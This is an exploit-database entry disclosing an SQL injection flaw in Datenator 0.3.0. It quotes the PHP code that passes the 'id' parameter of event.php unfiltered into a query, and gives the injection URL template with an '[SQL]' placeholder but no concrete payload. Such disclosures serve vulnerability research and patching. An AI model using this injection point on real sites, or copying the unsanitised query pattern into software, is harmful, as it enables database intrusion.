[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Datenator 0.3.0 (event.php id) SQL Injection

Author
The_HuliGun
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10405
Category
web applications
Date add
26-12-2009
Platform
unsorted
============================================
Datenator 0.3.0 (event.php id) SQL Injection
============================================

# Exploit Title: Datenator 0.3.0 (event.php id) SQL Injection
# Date: 26.12.09
# Author: The_HuliGun
 
# Look on code in event.php:
  
22: if(isset($_GET['id']))
23: {
24:     $event = $datenator->read_event_info($_GET['id']);
 
# Function read_event_info() is in file includes/functions.php
 
412: function read_event_info($event_id)
413:    {
414:        $sql = "SELECT * FROM
415:        ".$this->getConfig('db_tableprefix')."events,
416:        ".$this->getConfig('db_tableprefix')."events_repeat
417:        WHERE
418:        ".$this->getConfig('db_tableprefix')."events.event_id = ".$this->prepare_sql($event_id)." and 
419:        ".$this->getConfig('db_tableprefix')."events_repeat.repeat_event_id = ".$this->prepare_sql($event_id)."";
420:
421:        $event_data=$this->db->Execute($sql);
422:
423:        if($event_data) {
424:            return $event_data;
                        ...
 
# As you can see variable id is not filtered, so, we can use such exploit with any php settings:
 
http://[targethost]/[path]/event.php?id=[SQL]
 
# Bug discovered by The_HuliGun
 
# Greetz to: NaTka, hope you'll find yourself ;>
 
# See u soon!



#  0day.today [2024-11-15]  #